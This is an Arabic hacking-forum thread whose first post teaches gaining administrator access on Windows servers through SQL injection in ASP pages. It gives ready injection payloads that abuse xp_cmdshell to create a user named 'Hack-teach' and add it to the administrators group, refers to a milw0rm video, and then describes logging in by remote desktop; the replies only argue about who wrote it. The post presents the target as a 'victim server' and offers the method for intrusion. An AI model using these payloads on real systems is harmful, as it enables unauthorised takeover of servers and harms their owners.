شركة استضافة . مركز تحميل . الاسلام . مكتبة الفيديو . تحميل من يوتيب . المجموعة البريدية . خدمات للمواقع . اتصل بنا

حياك الله اخي الزائر هذة الرسالة تظهر للغير مسجيلن يشرفنا تسجيلك في منتديات القرصان للتسجيل اضغط هنا


العودة   منتديات القرصان > المواقع والسرفرات > قرصنة المواقع و السيرفرات

قرصنة المواقع و السيرفرات شرح الاختراق و اخر الثغرات

Tags H1 to H6

منتديات القرصان

أخذ الروت عن طريق ثغرات ال SQL Injection في لغـة الـ asp ( سيرفرات الوندوز )

أخذ الروت عن طريق ثغرات ال SQL Injection في لغـة الـ asp ( سيرفرات الوندوز )

إضافة رد
آلقائمة الرئيسية
التسجيل
البحث
مشاركات اليوم
التقويم
التعليمات
المتواجدون حالياً
مشاهدة ملفي الشخصي

مواقع صديقة

روابط مفيدة
طلب كلمة المرور
كود التفعيل
تفعيل العضوية
مراسلة الإدارة

آخبار المنتدى
- $vbphrase[sclt_by] $vietvbb_sclt[postusername]

محركات البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 02-16-2008, 05:01 PM
مؤوسس الشبكة
 
تاريخ التسجيل: Jul 2006
الدولة: اليمن=يافع
المشاركات: 10,397
alkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud of
افتراضي أخذ الروت عن طريق ثغرات ال SQL Injection في لغـة الـ asp ( سيرفرات الوندوز )

:: السلام عليـكم ورحمة الله وبركاته ::

موضوع الفيديو يتكلم عن أخذ الروت داخل نظام الوندوز دون الحاجة لرفع الشل بتطبيق ثغرات الريموت انجيكشن ( ثغرات الحقن ) .

ثغرات الانجيكشن داخل نظام لغـة ال Asp يتم بعمل ابديت او تحديث للقاعدة ..
والطلب يكون بالامر

كود PHP:
having 1=
لاستخراج الاعمدة من القاعدة ومن ثم الحصر بالجروب ..

وبالتالي عملية الابديت .. وتقدر ترفع عن طريقها شل بشكل بسيط ..

الان الفيديو هذا داعم لاخذ الروت داخل نظام الويندوز ..

قبل لا نطلب
كود PHP:
having 1=
بمجرد اكتشافنا للخطا في النظام ودالة exec مفعلة بالسيرفر الضحية . بالتالي يبقى احنا أكيد أخذنا الروت

وهذا الفيديو واضح وبسيط وبيوضح عمل اضافة اليوزر بالحقن ..
على الرابط التالي

كود PHP:
http://milw0rm.com//video/watch.php?id=70 
الاوامر المستخدمـة :

أمر اضافة المستخدم :
كود PHP:
/file.asp?id=1exec master..xp_cmdshell 'net user Hack-teach coldz3ro /add' ;-- 
أمر وضع المستخدم في قائمة الادمن ( الروت ) :
كود PHP:
/file.asp?id=1exec master..xp_cmdshell 'net localgroup administartor Hack-teach /add' ;-- 

وبعدها تروح تعمل ريموت ديسك توب مثل ما هو موضح بالفيديو .

امل ان اكون افدتكم بالشيء القليل .

الحقوق محفوظـة ولله الحمد والشكر
المتوكل على الله : Cold z3ro
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس

حمل اي مقطع فيديوا من 
اليوتيب بدون برامج

اقوى استضافة عربية

  #2  
قديم 03-26-2009, 05:23 PM

قرصان امني

 
تاريخ التسجيل: Jun 2008
المشاركات: 114
المجهوول will become famous soon enough
افتراضي

باارك الله فيك اخوي
والحقوق مو الاصلية لكولد زيرو
الحقوق للاجانب
لشخص اجنبي
تحياتي
المجهوول
والله اعلم
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
  #3  
قديم 03-12-2010, 03:56 PM
مؤوسس الشبكة
 
تاريخ التسجيل: Jul 2006
الدولة: اليمن=يافع
المشاركات: 10,397
alkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud ofalkrsan has much to be proud of
افتراضي

انا نقلتة من الاخ كولد زيرو
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد



يتصفح الموضوع حالياً : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



جميع الأوقات بتوقيت GMT. الساعة الآن 12:50 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.3.2

تعريب » القرصان - خدمات الويب

:: الحماية برعاية (القرصان - خدمات الويب ) ::


Secruity By Krsan.com
جميع الحقوق محفوظة القرصان 2006-2010